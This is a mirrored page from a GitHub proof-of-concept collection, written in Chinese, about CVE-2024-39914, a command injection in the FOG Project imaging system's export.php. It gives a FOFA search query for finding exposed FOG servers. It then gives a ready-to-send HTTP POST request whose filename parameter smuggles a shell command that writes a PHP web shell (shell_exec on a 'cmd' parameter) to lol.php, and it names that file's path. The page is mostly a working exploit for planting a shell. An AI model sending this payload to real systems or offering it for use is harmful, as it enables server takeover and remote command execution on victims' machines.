mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 14:04:06 +00:00
25 lines
871 B
Markdown
25 lines
871 B
Markdown
# fogproject系统接口export.php存在远程命令执行漏洞(CVE-2024-39914)
|
||
|
||
FOG是一款克隆/成像/救援套件/库存管理系统。在版本低于1.5.10.34的情况下,FOG中的packages/web/lib/fog/reportmaker.class.php文件受到命令注入漏洞的影响,该漏洞存在于/fog/management/export.php的文件名参数中。此漏洞已在版本1.5.10.34中得到修复。
|
||
|
||
## fofa
|
||
|
||
```yaml
|
||
body="FOG Project"
|
||
```
|
||
|
||
## poc
|
||
|
||
```yaml
|
||
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET['"'cmd'"']);+?>'+>+lol.php)&type=pdf HTTP/1.1
|
||
Host: 192.168.15.5
|
||
Content-Length: 21
|
||
User-Agent: ToxicPotato
|
||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
|
||
fogguiuser=fog&nojson=2
|
||
```
|
||
|
||

|
||
|
||
文件路径:`/fog/management/lol.php` |